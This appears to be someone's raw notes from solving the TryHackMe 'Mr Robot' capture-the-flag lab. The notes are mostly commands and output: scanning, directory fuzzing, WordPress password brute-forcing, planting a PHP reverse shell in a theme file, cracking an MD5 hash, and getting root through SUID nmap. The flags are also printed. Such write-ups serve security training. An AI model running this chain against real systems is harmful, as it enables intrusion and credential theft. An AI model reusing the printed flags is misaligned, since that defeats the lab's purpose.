nmap -sV --script -oN log.out vuln 10.10.242.3 

curl -s  http://10.10.242.3/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
                                                                                                                                            
┌──(root💀lucy)-[/home/gd/Desktop/THM/Mr_Robot_CTF]
└─# curl -s  http://10.10.242.3/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9


ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.242.3/FUZZ -e .aspx,.html,.php,.txt -mc 302,200,301

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.242.3/FUZZ -mc 302,200,301

gobuster dir -u http://10.10.242.3/ -w /usr/share/wordlists/dirb/common.txt -q -t 15 -x php,html,txt,bak,sh,cgi,zip

wpscan --url 10.10.242.3 --wp-content-dir wp-admin --usernames elliot --passwords ~/Downloads/fsocity-sorted.dic


curl -s http://10.10.242.3/license | tr -d "\n"
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something?ZWxsaW90OkVSMjgtMDY1Mgo=                                                                                                                                            
┌──(root💀lucy)-[/home/gd/Desktop/THM/Mr_Robot_CTF]
└─# echo 'ZWxsaW90OkVSMjgtMDY1Mgo=' | base64 -d
elliot:ER28-0652

login
http://10.10.242.3/wp-admin/users.php

edit --->appearance --> themes
shell.php
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

http://10.10.242.3/404.php

python -c 'import pty; pty.spawn("/bin/sh")'

$ ls
key-2-of-3.txt
password.raw-md5
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
$ su - robot      
su: must be run from a terminal
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot

https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b
c3fcd3d76192e4007dfb496cca67e13b
reverse to:
abcdefghijklmnopqrstuvwxyz


$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ ls
ls
key-2-of-3.txt  password.raw-md5
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz

Sorry, user robot may not run sudo on linux.


$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ 

or
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown


which nmap
which nmap
/usr/local/bin/nmap
$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root
# pwd
pwd
/tmp
# cd /root
cd /root
# ls
ls
firstboot_done  key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
# 

https://gtfobins.github.io/gtfobins/nmap/




https://tryhackme.com/room/mrrobot
https://sparshjazz.medium.com/tryhackme-mr-robot-ctf-writeup-d2ccad34e6b7
https://infosecwriteups.com/tryhackme-mr-robot-ctf-writeup-ff0b3be5bd18
https://0xtaylor.github.io/content/writeups/tryhackme/thm-MrRobot.html
https://ichi.pro/vi/tryhackme-mr-robot-ctf-log-218045850085825
https://www.aldeid.com/wiki/TryHackMe-Mr-Robot-CTF

https://pentestlab.blog/category/privilege-escalation/

